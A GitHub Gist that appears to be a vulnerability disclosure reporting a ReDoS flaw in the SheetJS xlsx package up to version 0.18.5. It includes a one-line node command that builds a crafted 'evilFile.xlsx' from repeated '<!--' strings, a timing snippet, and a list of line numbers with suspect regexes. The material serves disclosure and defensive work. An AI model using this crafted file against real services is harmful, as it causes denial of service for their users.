Created
January 7, 2024 11:52
-
-
Save francoatmega/db34e8962dc0aa3c83113cb94659df14 to your computer and use it in GitHub Desktop.
ReDoS vulnerability via a crafted file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| In the version 0.18.5 and lower a specially crafted file can lead to excessive CPU consumption through a ReDoS. | |
| Crafted file: node -e 'console.log("<!--".repeat(150387))' > evilFile.xlsx | |
| Snippet code: | |
| const xlsx = require('xlsx'); | |
| (() => { | |
| console.time() | |
| xlsx.readFile('./data.xlsx', {}); | |
| console.timeEnd() | |
| })(); | |
| The vulnerable function in this case above is the function parse_xlml_xml | |
| I didn’t had enough time to analyse all other potential ReDoS vulnerabilities, but there are a lot of them in sheetjs/xlsx.flow.js, I at least did a prior analysis and found this likes of possible vulnerable Regex. | |
| 3049 | |
| 3613 | |
| 3614 | |
| 3781 | |
| 3814 | |
| 3860 | |
| 5603 | |
| 5734 | |
| 5772 | |
| 9947 | |
| 9948 | |
| 9973 | |
| 10398 | |
| 10968..10973 | |
| 10978 | |
| 11488..11490 | |
| 11511 | |
| 12103 | |
| 12209 | |
| 12212 | |
| 12215 | |
| 12218 | |
| 12224 | |
| 15251 | |
| 15252 | |
| 15254 | |
| 15255 | |
| 15256 | |
| 15257 | |
| 15258 | |
| 15259 | |
| 15484 | |
| 15557 | |
| 16945 | |
| 16946 | |
| 16952 | |
| 16954 | |
| 16969 | |
| 17898 | |
| 17899 | |
| 21623 | |
| 21710 | |
| 21875 | |
| 21878 | |
| 22706 | |
| 26296 | |
| If you need more information please ping me back |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment